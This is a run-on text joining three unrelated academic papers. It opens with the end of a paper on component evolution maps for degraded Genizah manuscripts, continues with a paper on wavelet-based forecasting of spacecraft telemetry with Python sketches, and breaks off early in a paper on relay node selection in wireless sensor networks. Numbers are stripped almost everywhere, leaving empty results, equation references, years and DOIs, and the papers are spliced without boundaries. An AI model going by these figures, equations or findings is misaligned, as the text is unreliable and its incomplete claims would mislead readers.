reasonable quality, it gave meaningless results on our extremely degraded dataset. stroke width estimation another application for utilizing evolution maps is evaluation of the range of stroke width in degraded documents. many binarization methods use the stroke width as part of the binarization process (e.g., su, lu & tan, ; liu & srihari, ; rivest-hénault, moghaddam & cheriet, ; badekas and papamarkos, ; ntirogiannis, gatos & pratikakis, ). in extremely degraded documents, calculating the stroke width is hard and is highly influenced by noise and stains. 
the stroke width evolution map provides a statistical and comprehensive overview of the range of stroke widths revealed by the range of intensity thresholds. to estimate the stroke width for a component, we first compute the component’s distance transform, starting from the boundary of the component. we compute the biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure let a be the stroke width. the maximal values the distance transform of the component achieves are around a/ . the average therefore can be used as an estimate for a/ . average of the distance transform values inside the component and multiply it by four to receive an estimate for the average stroke width (see illustration in fig. ). a stroke width is consistent if it does not change much within the component. we compute a consistency factor for the stroke within of the component, using the standard deviation of the histogram of the component’s distance transform. for each component we multiply its area by the stroke width consistency factor, so components with consistent stroke width will have a higher weight. in the cem, we depict for each stroke width and intensity the sum of the weighted component areas. we select the most salient blob on the map using techniques described earlier, and use the gaussian fit of that blob as an estimate of the stroke width. in fig. we show an example document with its stroke width evolution map. in the map, the selected blob is marked with a white boundary. the estimated range of stroke widths is illustrated on the top left of the document using red lines. the left and rightmost lines are the range boundaries and the middle line shows the average stroke width detected. to evaluate this method, we took fifteen degraded historical documents from the cairo genizah and sampled the stroke width manually in several random characters in the document. over . % of the samples across the documents where within the range of the estimate. analysis of feature distribution in documents in many applications of document analysis, one of the first steps is looking for suitable features. the evolution maps provide a convenient tool for exploring and visualizing the behavior of different features in a given document. using the maps, one can explore each feature, the distribution of its values, and view the elements of the document corresponding to different value ranges of that feature. based on the cem, we developed an interactive tool which enables flexible generation and exploration of evolution maps per property, which we call the evolution map explorer. the user can interactively examine the maps, adjust the maps’ display by setting properties for each map, and explore the maps. the user defines an area on the cem with the mouse biller et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure (a) a document and (b) its stroke width evolution map. the selected blob on the map (marked with a white border) is used to estimate the stroke width of letters in the document. the estimate is marked by red vertical lines over the document image. the leftmost and the rightmost lines are the range boundaries and the middle line shows the average stroke width detected. (see, e.g., the black rectangle in the cem in fig. 
, and the system marks on the image of the document the elements corresponding to the rectangle and displays information about the selection, e.g., the range of intensities, the range of property values, and the count of elements relevant for this selection.

for example, we picked a document and the feature "transition average." our tool created the evolution map, shown in fig. . in this evolution map, the x axis represents the average number of transitions from background to foreground for a connected component (averaging over the rows and columns of the component).

figure . a general overview of the application. the four presented evolution maps are the width, principal direction, height and transition number average. the rectangle in the height cem corresponds to the letters in the document on the left of the figure, whose heights and intensities correspond to the values in the rectangle.

the figure shows, for each selected rectangle on the cem, the document and the elements corresponding to this rectangle. the leftmost rectangle represents noise elements, which have average transition values around . the middle rectangle represents sets of characters with average transition values ranging from . to . . the rightmost rectangle represents elements including more than one connected character, with average transition values from . to . . one can observe on the cem (fig. ) a number of peaks which distinguish between characters with a high average transition count and a low one. by selecting different rectangles within this area, the user can explore the distribution of the different letters corresponding to the examined feature, and estimate the feature's ability to discriminate between different letters.

figure . the evolution map of transition average for a document. three selections of peak ranges (marked by black rectangles) in the evolution map; for each selection, the elements corresponding to the selection are marked over the document. the leftmost range includes transition values around , the middle selection contains transition values from . to . , and the rightmost values between . and . .

summary

in this work we introduced the component evolution map, which maps the evolution of a property of the connected components along the change in gray scale intensity level. we have demonstrated the contribution and potential of the cem in several tasks: estimating letter dimensions, improving a state-of-the-art binarization algorithm, performing line segmentation in degraded documents, stroke width estimation, and analysis of feature distribution in text documents. this method is applicable for a wide range of text documents, and is especially capable of dealing with highly degraded and noisy documents. we see in the cem method potential for contribution in different directions in the document analysis field. we plan to continue looking for different ways to exploit the information gained by the cems, and also to apply evolution maps to additional features. among the uses we plan to examine is the usage of the maps as a descriptor of a document for classification by writer or by origin manuscript (finding fragments of the manuscript). furthermore, we plan to deal with limitations assumed in this work, such as handling more than one writing style on a page.
another interesting direction we plan to investigate is using the maps for extracting automatically the degradation level of the document.

the documents used in our experiments are accessible via the genizah project site (http://www.genizah.org/). to receive the ground truth data, please contact the authors by email.

acknowledgements

this research was supported in part by the dfg-trilateral grant no. . we thank prof. uri ehrlich and uri safrai from the goldstein-goren department of jewish thought, ben-gurion university of the negev, for their assistance in generating the ground truth.

additional information and declarations

funding
this project was funded by the german research foundation under contract fi / - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: german research foundation: fi / - .

competing interests
klara kedem is an academic editor for peerj computer science.

author contributions
• ofer biller conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work.
• irina rabaev conceived and designed the experiments, performed the experiments, performed the computation work.
• klara kedem conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper.
• its'hak dinstein and jihad j. el-sana conceived and designed the experiments, analyzed the data, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: the ground truth transcription for a set of documents from the genizah collection, named by catalog number, formatted by webgt, and detailed at http://ieeexplore.ieee.org/xpl/articledetails.jsp?arnumber= . the data can be found at: http://www.cs.bgu.ac.il/~billero/genizahdocumentsannotationdata.zip.

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references

asi a, saabni r, el-sana j. . text line segmentation for gray scale historical document images. in: proceedings of the workshop on historical document imaging and processing. new york: acm, – . available at http://dl.acm.org/citation.cfm?id= .
badekas e, papamarkos n. . optimal combination of document binarization techniques using a self-organizing map neural network. engineering applications of artificial intelligence ( ): – doi . /j.engappai. . . .
bar-yosef i, beckman i, kedem k, dinstein i. . binarization, character extraction, and writer identification of historical hebrew calligraphy documents. international journal on document analysis and recognition ( ): – doi . /s - - - .
biller o, asi a, kedem k, el-sana j. . webgt: an interactive web-based system for historical document ground truth generation. technical report – . be'er sheva: computer science department, ben-gurion university of the negev, israel.
bukhari ss, azawi miaa, shafait f, breuel tm. . document image segmentation using discriminative learning over connected components. in: doermann ds, govindaraju v, lopresti dp, natarajan p, eds. the ninth iapr international workshop on document analysis systems, das . new york: acm, – .
de carvalho mag, da costa al, ferreira acb, marcondes césar júnior r. . image segmentation using component tree and normalized cut. in: sibgrapi. piscataway: ieee computer society, – .
fischer a, frinken v, fornes a, bunke h. . transcription alignment of latin manuscripts using hidden markov models. in: st international workshop on historical document imaging and processing (hip). new york: acm, – .
fischer a, keller a, frinken v, bunke h. . lexicon-free handwritten word spotting using character hmms. pattern recognition letters : – doi . /j.patrec. . . .
gatos b, stamatopoulos n, louloudis g. .
icdar handwriting segmentation contest. international journal on document analysis and recognition ( ): – doi . /s - - - .
garz a, fischer a, sablatnig r, bunke h. . binarization-free text line segmentation for historical documents based on interest point clustering. in: document analysis systems (das), th iapr international workshop. piscataway: ieee, – .
jain ak, zhong y. . page segmentation using texture analysis. pattern recognition ( ): – doi . / - ( ) -x.
liu y, srihari sn. . document image binarization based on texture features. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . .
mosorov v, kowalski tm. . the development of component tree for grayscale image segmentation. in: proceedings of the international conference on modern problems of radio engineering, telecommunications and computer science tcset. piscataway: ieee, – .
naegel b, wendling l. . a document binarization method based on connected operators. pattern recognition letters ( ): – doi . /j.patrec. . . .
new b, ferrand l, pallier c, brysbaert m. . reexamining the word length effect in visual word recognition: new evidence from the english lexicon project. psychonomic bulletin and review ( ): – doi . /bf .
ntirogiannis k, gatos b, pratikakis i. . a modified adaptive logical level binarization technique for historical document images. in: th international conference on document analysis and recognition. piscataway: ieee, – .
pajdla t, urban m, chum o, matas j. . robust wide baseline stereo from maximally stable extremal regions. in: proceedings of the british machine vision conference. available at http://cmp.felk.cvut.cz/~matas/papers/matas-bmvc .pdf.
pikaz a, averbuch a. . digital image thresholding, based on topological stable-state. pattern recognition ( ): – doi . / - ( ) - .
pratikakis i, gatos b, ntirogiannis k. . h-dibco — handwritten document image binarization competition. in: icfhr. piscataway: ieee computer society, – .
rabaev i, biller o, el-sana j, kedem k, dinstein i. . text line detection in corrupted and damaged historical manuscripts. in: th international conference on document analysis and recognition (icdar' ). piscataway: ieee.
raju ss, pati pb, ramakrishnan ag. a.
gabor filter based block energy analysis for text extraction from digital document images. in: proceedings of the first international workshop on document image analysis for libraries (dial' ). piscataway: ieee computer society. available at http://dl.acm.org/citation.cfm?id= . .
raju ss, pati pb, ramakrishnan ag. b. gabor filter based block energy analysis for text extraction from digital document images. in: document image analysis for libraries. piscataway: ieee, – .
rivest-hénault d, moghaddam rf, cheriet m. . a local linear level set method for the binarization of degraded historical document images. international journal on document analysis and recognition ( ): – doi . /s - - - .
roy p, pal u, llados j, delalandre m. . multi-oriented and multi-sized touching character segmentation using dynamic programming. in: proceedings of the th international conference on document analysis and recognition, icdar ' . piscataway: ieee computer society, – .
su b, lu s, tan cl. . robust document image binarization technique for degraded document images. ieee transactions on image processing ( ): – doi . /tip. . .
wen d, ding x. . a general framework for multicharacter segmentation and its application in recognizing multilingual asian documents. in: smith ehb, hu j, allan j, eds. proceedings of the spie conference on document recognition and retrieval xi, vol. . bellingham: spie, – . available at https://www.msu.edu/~wendi/publication/drrxi_manuscript.pdf.
zagoris k, papamarko n. . text extraction using document structure features and support vector machines. in: proceedings of the th iasted international conference computer graphics and imaging (cgim ). calgary: iasted, – .
application of wavelet analysis in the prediction of telemetry data

international journal of advanced network, monitoring and controls, volume , no. , doi: . /ijanmc- -

xu jiangtao, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com
liu pingping, school of computer science and engineering, xi'an technological university, xi'an, china, e-mail: @qq.com

abstract—with the rapid development of space technology and the increasing number of spacecraft, in-orbit risk also increases, and ensuring the safety and reliability of spacecraft becomes particularly important. prediction technology can forecast spacecraft failures in advance, which gains valuable time for troubleshooting and thereby increases the safety and reliability of spacecraft operation. in this paper, considering the non-stationarity and periodicity of telemetry data, prediction of the data based on wavelet analysis is introduced and a short-term forecasting model based on the mallat algorithm is established. the experimental results show that the prediction curve is basically consistent with the actual curve.

keywords—wavelet analysis; fourier transform; periodic autoregression; models; mallat

i. introduction

the prediction of spacecraft faults has long been a hot research field. prediction theory developed over many years until finite-parameter linear models for discrete parameters were proposed, which made it possible to combine prediction theory with the computer. according to the different properties of the forecast, forecasting methods are generally divided into two categories: time series forecasting and causal prediction. time series prediction uses past values to predict future values, while causal forecasting uses known variables to predict the values of other variables. in this paper, the time series forecasting method is used to forecast the future development trend of the telemetry data.

ii. wavelet analysis theory

a. wavelet analysis

the wavelet analysis method adapts its analysis window to the frequency content of a non-stationary signal: low-frequency information is analyzed with a wide time window, and high-frequency information with a narrow time window. a wavelet is a small, localized wave: a waveform of finite length with zero average. wavelets are defined as follows [ ]. let $\psi(t)$ be a square-integrable function, namely $\psi(t) \in L^2(R)$. if its fourier transform $\hat{\psi}(\omega)$ satisfies the admissibility condition

$C_\psi = \int_R \frac{|\hat{\psi}(\omega)|^2}{|\omega|}\, d\omega < \infty$,  ( )

then $\psi(t)$ is called a basic wavelet or wavelet generating function. when the generating function $\psi(t)$ is dilated and translated, the family of functions $\psi_{a,\tau}(t)$ is obtained:
$\psi_{a,\tau}(t) = \frac{1}{\sqrt{a}}\, \psi\!\left(\frac{t-\tau}{a}\right)$, where $a, \tau \in R$, $a \neq 0$.  ( )

in this formula, $a$ is the scaling factor and $\tau$ is the translation factor. because the values of the scale factor and the translation factor change continuously, the result is a family of functions obtained by dilation and translation of the generating function, also called sub-wavelets.

b. mallat algorithm

the basic idea of the mallat algorithm is as follows: let $H_j f$ be the approximation of an energy-limited signal $f \in L^2(R)$ at resolution $j$; $H_j f$ is then further decomposed into the approximation of $f$ at the next, coarser resolution and the detail between the two resolutions.

1) decomposition algorithm of the mallat algorithm. from multi-resolution analysis, $L^2(R) = \bigoplus_{j \in Z} W_j$, so for an arbitrary function $f(t) \in L^2(R)$ we get

$f(t) = \sum_{j,k \in Z} c_{j,k}\, \psi_{j,k}(t)$.  ( )

taking the inner product of both sides with $\psi_{j,k}$, and because $\{\psi_{j,k}(t)\}_{j,k \in Z}$ is an orthonormal basis of $L^2(R)$, we get $c_{j,k} = \langle f, \psi_{j,k} \rangle$, and thus

$f(t) = \sum_{j,k \in Z} \langle f, \psi_{j,k} \rangle\, \psi_{j,k}(t)$.  ( )

from multi-resolution analysis, any function $f_j$ of $V_j$ can be expressed in the following form:

$f_j = f_{j+1} + d_{j+1} = f_{j+2} + d_{j+2} + d_{j+1} = \cdots = f_m + d_m + \cdots + d_{j+1}$,

where

$f_j(t) = \sum_k c^{\,j}_k\, \phi_{j,k}(t)$, $d_j(t) = \sum_k d^{\,j}_k\, \psi_{j,k}(t)$.  ( )

$f_m$ represents the low-frequency component of $f_j(t)$, while the $d_l(t)$, $l = j+1, \ldots, m$, indicate the high-frequency components of $f_j$ at different resolutions. because

$f_j(t) = \sum_k c^{\,j}_k\, \phi_{j,k}(t) = \sum_k c^{\,j+1}_k\, \phi_{j+1,k}(t) + \sum_k d^{\,j+1}_k\, \psi_{j+1,k}(t)$,

and because of the orthogonality of $\phi$ and $\psi$ under dyadic translation and scaling, one obtains

$c^{\,j+1}_k = \sum_n h_{n-2k}\, c^{\,j}_n$,  ( )

$d^{\,j+1}_k = \sum_n g_{n-2k}\, c^{\,j}_n$.  ( )

formulas ( ) and ( ) are the wavelet decomposition algorithm of the mallat algorithm, where $\{h_k\}_{k \in Z}$ is the filter coefficient sequence given by the two-scale equation of the corresponding orthogonal scaling function, and $\{g_k\}$ is the associated wavelet filter.

2) reconstruction algorithm of the mallat algorithm. the reconstruction algorithm of the mallat algorithm is the inverse process of its decomposition algorithm. in convolution form the mallat algorithm can be represented as

$c^{\,j+1} = D(c^{\,j} * \tilde h)$, $d^{\,j+1} = D(c^{\,j} * \tilde g)$, $c^{\,j} = U c^{\,j+1} * h + U d^{\,j+1} * g$,  ( )

where $\tilde h$ is the conjugate time-reversal of the filter $h$, $c^{\,j} * \tilde h$ is the convolution of $c^{\,j}$ and $\tilde h$, $D(c^{\,j} * \tilde h)$ is the dyadic down-sampling of $c^{\,j} * \tilde h$, and $U$ denotes dyadic up-sampling.

iii. the research of telemetry data time series prediction based on the mallat algorithm

a. the characteristics of telemetry data

telemetry data varies in a non-stationary way: commonly used statistics of the telemetry data (such as the mean and the autocorrelation function) often vary with time, which brings great difficulty to telemetry data forecasting. the statistics of the telemetry data in tables i and ii differ considerably between stages; the statistical parameters of every stage show that the sequences are non-stationary time series. wavelet analysis has a great advantage in dealing with this kind of data.

table i. the test results of a remote sensing data stationarity (rows: time, mean value, variance).

table ii. the test results of a remote sensing data stationarity (rows: time, mean value, variance).
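as a concrete illustration of the decomposition and reconstruction steps described above, the following python sketch uses the pywavelets library (our choice for illustration; the paper does not name an implementation). the wavelet order, the decomposition level and the toy signal are placeholders, not the settings used in the paper.

```python
# minimal sketch of a mallat-style decomposition/reconstruction with pywavelets.
import numpy as np
import pywt

t = np.arange(240)                                               # 4 hours of per-minute samples
x = np.sin(2 * np.pi * t / 60) + 0.1 * np.random.randn(t.size)   # toy telemetry-like series

# decomposition: one approximation plus one detail per scale
coeffs = pywt.wavedec(x, wavelet="db4", level=3)                 # [cA3, cD3, cD2, cD1]

# reconstruct the low-frequency approximation and each high-frequency detail separately
approx = pywt.waverec([coeffs[0]] + [np.zeros_like(c) for c in coeffs[1:]], "db4")
details = []
for i in range(1, len(coeffs)):
    keep = [np.zeros_like(c) for c in coeffs]
    keep[i] = coeffs[i]
    details.append(pywt.waverec(keep, "db4"))

# summing the reconstructed sub-sequences recovers the original signal
recon = approx[: x.size] + sum(d[: x.size] for d in details)
print(np.max(np.abs(recon - x)))   # close to zero (perfect reconstruction)
```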
figures and show the change curves of telemetry data and over four consecutive hours. it can be seen that the output power sequence exhibits periodicity as well as randomness. with periodicity and randomness coexisting, the sequence can be seen as the superposition of different frequency components; the components within each frequency band have similar frequency characteristics and the same pattern of variation. if a prediction model is established for each subsequence with a single type of variation, the simpler characteristics of each subsequence reduce the difficulty of selecting a forecasting model.

figure . data of consecutive hours curve graph.

figure . data of consecutive hours curve graph.

b. the choice of wavelet function

there are some abrupt changes (mutations) in the trend of spacecraft telemetry data, and these mutations reflect the actual state of the satellite. in order to accurately capture the mutation points, the wavelet function is usually required to converge fast, i.e., to attenuate quickly to zero [ ]. in this paper, the db wavelet is chosen as the wavelet basis for decomposing a certain telemetry data sequence at different scales. figure compares the results of scale decomposition of a telemetry data sequence with dbn wavelets for n = , , , .

figure . comparison results of dbn wavelet bases, n = , , , .

besides the admissibility condition and the regularity condition [ ], the chosen wavelet function should satisfy the following conditions: 1) good compact support; 2) $\psi(t)$ has vanishing moments, which give the wavelet function good locality in the frequency domain; 3) orthogonality.

c. wavelet decomposition scale study

because the telemetry data is not stationary, its cycle of change is difficult to see directly, and slow and fast variations are mixed together; that is, cycles of different sizes are nested within each other. separating the different frequency components therefore makes the pattern of change more intuitive and also mitigates the non-stationarity of the data [ ]. the figure shows a comparison between the approximation parts an obtained by decomposing the sequence with the db wavelet at different scales and the original sequence.

figure . comparison of the approximation parts at different decomposition scales.

it can be seen that at decomposition scale the curve of the approximation part a is smooth enough and basically maintains the shape of the original curve, while for a and a the number of sampling points is reduced as the scale increases, the approximation curves are too smooth, and the trend of the sequence is distorted; therefore this paper chooses decomposition scale .

d. forecasting model of time series

time series forecasting [ ][ ] is one of the methods of statistical analysis. its modeling idea rests on the basic assumption that the past behavior of the telemetry data will continue into the future, that is, the future is a continuation of the past. in this paper, the periodic autoregressive model (par model) [ ][ ] is used, as follows: if there is a time series x, its expression is

$x_t = a_{0,t} + a_{1,t}\, x_{t-1} + a_{2,t}\, x_{t-2} + \cdots + a_{p,t}\, x_{t-p} + \varepsilon_t$,  ( )

subject to the following conditions: 1) $\varepsilon_t$ is an independent sequence with expected value $E\varepsilon_t = 0$ and variance $E\varepsilon_t^2 = \sigma_t^2$; 2) for any $i = 1, \ldots, p$, $a_{i,t} = a_{i,t+T}$ and $\sigma_t = \sigma_{t+T}$ for all $t$, where $T$ is a positive number. then the model is a par model, $T$ is the cycle length of the par model, and $t$ is the phase of the par model.
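to make the par definition above concrete, the sketch below fits one set of coefficients per phase of the cycle by ordinary least squares and produces a one-step-ahead forecast. it is an illustration under our own assumptions (estimation method, cycle length T = 60 and order p = 3 are placeholders), not the fitting procedure used in the paper.

```python
# minimal sketch of fitting a periodic autoregressive (par) model: one coefficient
# vector [a_0, a_1, ..., a_p] per phase t of the cycle, estimated by least squares.
import numpy as np

def fit_par(x, T, p):
    """return a dict mapping phase -> coefficient vector [a_0, a_1, ..., a_p]."""
    coeffs = {}
    for phase in range(T):
        rows, targets = [], []
        for t in range(p, len(x)):
            if t % T == phase:
                rows.append([1.0] + [x[t - i] for i in range(1, p + 1)])
                targets.append(x[t])
        a, *_ = np.linalg.lstsq(np.array(rows), np.array(targets), rcond=None)
        coeffs[phase] = a
    return coeffs

def predict_next(x, coeffs, T, p):
    """one-step-ahead forecast for time index len(x)."""
    a = coeffs[len(x) % T]
    lags = [1.0] + [x[-i] for i in range(1, p + 1)]
    return float(np.dot(a, lags))

# toy per-minute series with a 60-sample cycle
x = list(np.sin(2 * np.pi * np.arange(600) / 60) + 0.05 * np.random.randn(600))
model = fit_par(x, T=60, p=3)
print(predict_next(x, model, T=60, p=3))
```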
the forecast model of the telemetry data is as follows. let $x_1, x_2, \ldots, x_n$ be telemetry data samples taken once per minute. the value of $x_t(h)$, $h$ steps into the future, is the value of $x_{t+h}$ conditioned on time $t$ and is taken as its predictive value, denoted $\hat{x}_n(h)$. according to this definition, a prediction model is established for one hour of the decomposed telemetry data sequence, and the length of the cycle is selected accordingly, namely p = t = . the par prediction model of this sequence can be represented by the following expression:

e. predicted results analysis

the predicted values of the reconstructed sub-sequences at the scales are compared with the original output power trends (figure ).

figure . comparison results between predicted values and actual results.

by analyzing the comparison between the actual telemetry data and the predicted values, it can be seen that the behavior of the prediction at the boundary and at trend mutations is not very ideal. in this paper, periodic continuation is applied to extend the boundary of the sequence. the idea of periodic continuation is that the signal is considered to be a periodic signal, and the extension process is as follows [ ][ ]:

$x_n = x_{n+M}$ for $n < 1$, and $x_n = x_{n-M}$ for $n > M$,

where $M$ is the length of the sequence. the comparison of the prediction curve and the actual curve after eliminating the boundary error is shown in figure .

figure . the comparison results between the predicted values and the actual values after boundary modification.

from the figure, we can see that the prediction results for the sequence are better than the results obtained by the wavelet transform.

iv. the performance evaluation of the telemetry data forecasting model

the idea of the optimal decision method is to use a linear transform to normalize the attribute values and, at the same time, to use the ideal point and the negative ideal point; compared with traditional methods it has more rationality and reliability. the ideal point is the best solution, whose target values are the best; the negative ideal point is the worst solution, whose target values are the worst. the optimal solution algorithm is as follows:
t k k p x v v v v v     ( ) calculate the relative close degree by the formula ( ) ( ) ( ): = . from the relative closeness of view, the time series forecasting model program has a higher rationality and reliability. v. conclusion this paper studies the telemetry data forecasting method based on wavelet analysis. through the analysis of the characteristics of the telemetry data, the characteristics of the non - stationary and certain periodicity of the telemetry data are established, and the prediction algorithm based on wavelet analysis is established. by choosing different wavelet bases and the decomposition scale, the decomposition results show that , db wavelet decomposition scale is the best. based on the mallat algorithm, the time series forecasting model is established according to the characteristics of detail data and approximate data. the experimental results show that the predicted values are in good agreement with the actual values. finally, through the analysis of the performance of the forecasting model, the forecasting model is reasonable and reliable. international journal of advanced network, monitoring and controls volume , no. , reference [ ] li-zhi cheng,hong-xia wang,yong luo.the theory and application of the wavelet[m].beijing:science press, : - [ ] xiang-bing meng.research and implementation of short term load forecasting model based on wavelet analysis[d].dalian:computer application technology of dalian university of technology, . [ ] jian tang,jia-hui luan,chen lv.interval forecasting technique of remote sensing data for small satellite power supply system[j].journal of huazhong university of science and technology (natural science edition), ( ): - . [ ] jia-lin zhang,xiao-jun wei.based on the optimization model of target decision method and its application research[j].financial theory and practice. ( ): - . [ ] zhen-ming sun.forecasting theory and technology in the application of the spacecraft[d].haerbing:harbin institute of technology, . [ ] zhen-ming sun,wei-guang an,hui zhang.spacecraft data to predict the causal relation adjustment technology application research[j].journal of aerospace, ( ): - . [ ] keon-tae sohn,deuk-kyun rha.the -hour-interval prediction of ground-level temperature[j].advanced in atmosphric sicences. ( ): - . [ ] chang-il k,in-keun y,y.h.song.kohonen neural network and wavelet transform based approach to short-trem load forecasting [j]. .electric power systems research, ( ): - . [ ] soltani skander.on the use of the wavelet decmpositoin for time series prediction[j].neurocomotuing, ( ): - . [ ] zheng hua,zhang lizi.the factor analysis of short-trem laod forecast based on wavelet transform[j].ieee, : - . [ ] zhang b l,coggins r.multiresolution forecasting for futures trading using wavelet decmpositions[j].ieee trans-actions on neural netoworks, , ( ): ~ . submitted august accepted november published december corresponding authors por lip yee, porlip@um.edu.my ihsan ali, ihsanalichd@siswa.um.edu.my academic editor rajanikanth aluvalu additional information and declarations can be found on page doi . /peerj-cs. copyright yee et al. distributed under creative commons cc-by . 
open access

improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks

por lip yee*, shahid mehmood*, ahmad almogren, ihsan ali and mohammad hossein anisi

department of computer system and technology, faculty of computer science and information technology, university of malaya, kuala lumpur, malaysia
department of computer science, college of computer and information sciences, king saud university, riyadh, saudi arabia
school of computer science and electronic engineering, university of essex, colchester, united kingdom
* these authors contributed equally to this work.

abstract
opportunistic routing is an emerging routing technology that was proposed to overcome the drawback of unreliable transmission, especially in wireless sensor networks (wsns). over the years, many forwarder methods have been proposed to improve the performance of opportunistic routing. however, the findings of existing works show that there is still room for improvement in this domain, especially in the aspects of latency, network lifetime, and packet delivery ratio. in this work, a new relay node selection method is proposed. the proposed method uses the minimum or maximum range and the optimum energy level to select the best relay node to forward packets, in order to improve the performance of opportunistic routing. omnet++ and the mixim framework were used to simulate and evaluate the proposed method, with simulation settings adopted from the benchmark scheme. the evaluation results showed that our proposed method outperforms the benchmark scheme in the aspects of latency, network lifetime, and packet delivery ratio.

subjects: adaptive and self-organizing systems, agents and multi-agent systems, algorithms and analysis of algorithms, artificial intelligence, computer networks and communications
keywords: opportunistic routing, optimum energy, threshold energy level, relay node, wireless sensor networks (wsns)

how to cite this article: yee pl, mehmood s, almogren a, ali i, anisi mh. . improving the performance of opportunistic routing using min-max range and optimum energy level for relay node selection in wireless sensor networks. peerj comput. sci. :e http://doi.org/ . /peerj-cs.

introduction
opportunistic routing (or) is a routing scheme that takes advantage of the broadcasting nature of the wireless medium to improve the link reliability, efficiency, and network throughput in multi-hop routing (chakchouk, ; eu, tan & seah, ; jadhav & satao, ). according to biswas & morris ( ), boukerche & darehshoorzadeh ( ), chachulski et al. ( ), choudhury & vaidya ( ) and larsson ( ), or improves network performance in the context of multi-hop and mesh networks, such as relay node selection in opportunistic networks. a multi-hop network is a network of relay nodes that are connected through communication links. due to the limited transmission range, the relay nodes in the network may not be able to communicate directly with the destination node.
hence, they need other relay nodes that can forward packets to the destination node (zhao, mosler & braun, ). in or, the forwarder method selects the forwarder node that is nearer to the destination node to forward the packets (jadhav & satao, ). for the source node to forward the packets to the destination node, the or forwarder method selects a next-hop, which is determined by using a routing metric such as energy, geographical distance, hop count, expected transmission count (etx), or expected transmission time (ett). these routing metrics could be used to forward the packets (menon, ). the source node constructs a list of forwarder nodes to transmit the packets to the destination node. this list is developed based on priority, and each relay node is selected based on the metrics required by the or forwarder method (biswas & morris, ).

there are several advantages of using or. compared to legacy routing, or avoids duplicate packet transmission, and it also significantly reduces the amount of packet retransmission due to link failures. or can exploit the reception of the same packet at multiple available relay nodes in order to improve the network performance, especially in multi-hop and mesh wireless networks (biswas & morris, ; chachulski et al., ; choudhury & vaidya, ; larsson, ). in multi-hop wireless networks, packets are forwarded via at least one intermediate relay node from the source node to the destination node (coutinho & boukerche, ). a mesh wireless network refers to a network topology in which the infrastructure nodes are connected directly, dynamically, and non-hierarchically to the other nodes (darehshoorzadeh, robson & boukerche, ; li et al., ). therefore, proposing an effective forwarder method to forward packets from one relay node to another in such networks is important because it will affect the performance of the networks (jain, dongariya & verma, ).

throughout the years, many forwarder methods have been proposed to improve the performance of or. in general, most of the forwarder methods use routing metrics such as energy, geographical distance, hop count, etx, and ett to forward packets (menon, ). however, these methods have several drawbacks, especially in the aspects of latency, first dead node, network lifetime, and receiving packets ratio. several relay node selection methods have been recommended as a means to improve the performance of routing in the opportunistic network. this study expands on that recommendation by aiming to improve the performance of routing in the opportunistic network. in this research work, a relay node selection method that uses the maximum and minimum range (min-max range) and the optimum energy level to select the best forwarder node, in order to improve the performance of or, is proposed. the simulation results showed that the proposed method achieved the lowest latency, produced the highest time until the first dead node, improved the network lifetime, and produced a higher receiving packet ratio compared to the related works (aor, eno_or, ens_or, exor, geraf, and eeor).

related works
in , zorzi & rao ( ) proposed a forwarder method named geographic random forwarding (geraf). this method is based on the geographical location of the nodes involved. initially, the active relay nodes, which are located nearer to the destination node, will send a "clear to send" message to the source node.
the source node then will discover the relay nodes that can participate in the packet forwarding process around its coverage area. during the discovery, the source node will receive an acknowledgement from each of the relay nodes that can participate in packet forwarding. the source node will randomly select one of the relay nodes as the forwarder node to forward the packet. the forwarder node will use the same mechanism to randomly select another forwarder node until the packet reaches the destination node. according to the authors, this method can reduce latency because it randomly selects a relay node that can forward a packet without further delay. however, the scheduling algorithm used in this method might produce a low network lifetime because it does not consider the energy level of the relay node when determining the forwarder node. energy is an important aspect because if a relay node has a low energy level, it might die quickly, or it might drop the received packet due to insufficient energy. biswas & morris ( ) proposed a forwarder method named opportunistic multi-hop routing (exor) in . according to the author, exor is one of the initial primary protocols, which practically implemented opportunistic routing in wsns. in this method, packets deliver to the same destination are grouped in a batch by the source node. each batch has a unique id. in order to deliver the packets, the source node needs to determine a forwarder node based on distance and the etx. higher priority is given to the node, which has a shorter distance and lesser etx. the source node will construct a list of forwarder nodes based on priority. the forwarder nodes will use the list to transmit packets via end-to-end transmission. the list is maintained by each of the forwarder nodes that participated in the packet transmission. according to the authors, this method can increase the throughput of large unicast transmissions in multi-hop wireless sensor networks. however, this method produced high overhead, especially during the coordination of all the relay nodes in the network. mao et al. ( ) proposed a forwarder method named energy-efficient opportunistic routing (eeor). the authors introduced a method to select a forwarder node by calculating the cost and energy using eq. ( ). cu(fwd ∗)=chu(fwd ∗)+cfu(fwd ∗)+ccu (fwd ∗) ( ) cu(fwd∗) is denoted as the expected cost of a source node to broadcast a packet to the destination node. chu(fwd ∗) is the cost for determining the relay node. cfu(fwd∗) is the cost for determining the forwarder node. ccu (fwd ∗) is the communication cost for the forwarder node to transmit packets. the cost of ccu (fwd ∗) is incurred when the network is at the ‘‘static’’ mode. in ‘‘active’’ mode, the cost of forwarding the packets is calculated based on the traffic flows. after calculating the cu(fwd∗), this method will select the related relay nodes that have the minimum costing to forward the packets from the source node to the destination node. according to the authors, this method can minimize yee et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. energy consumption and improve network lifetime. however, this method uses unicast and single-path to transmit packets. moreover, it required the nodes that take part in the transmission to be in an ‘‘active’’ mode always. as a result, this method might produce high first dead node for the networks. lee & haas ( ) proposed a forwarder method named short-haul multi-hop (short- haul). 
